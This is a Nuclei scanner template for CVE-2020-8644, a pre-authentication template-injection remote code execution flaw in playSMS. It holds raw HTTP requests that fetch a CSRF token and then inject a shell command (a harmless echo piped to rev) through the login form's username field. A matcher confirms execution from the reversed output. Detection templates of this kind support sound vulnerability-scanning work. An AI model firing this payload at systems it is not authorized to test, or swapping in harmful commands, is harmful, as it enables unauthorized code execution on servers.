nuclei-templates/cves/2020/CVE-2020-8644.yaml

57 lines
1.7 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2020-8644
info:
name: playSMS - Pre-Authentication Remote Code Execution (CVE-2020-8644)
author: dbrwsky
severity: critical
description: PlaySMS double processes a server-side template, resulting in unauthenticated user control of input to the PlaySMS template engine. The template engines implementation then permits arbitrary code execution.
reference:
- https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8644
- https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-8644
cwe-id: CWE-74
tags: cve,cve2020,ssti,playsms,rce,unauth
requests:
- raw:
- |
GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
cookie-reuse: true
redirects: true
max-redirects: 2
extractors:
- type: xpath
name: csrf
part: body
attribute: value
internal: true
xpath:
- /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
matchers-condition: and
matchers:
- type: word
part: body
words:
- '4468-0202-EVC'
- type: status
status:
- 200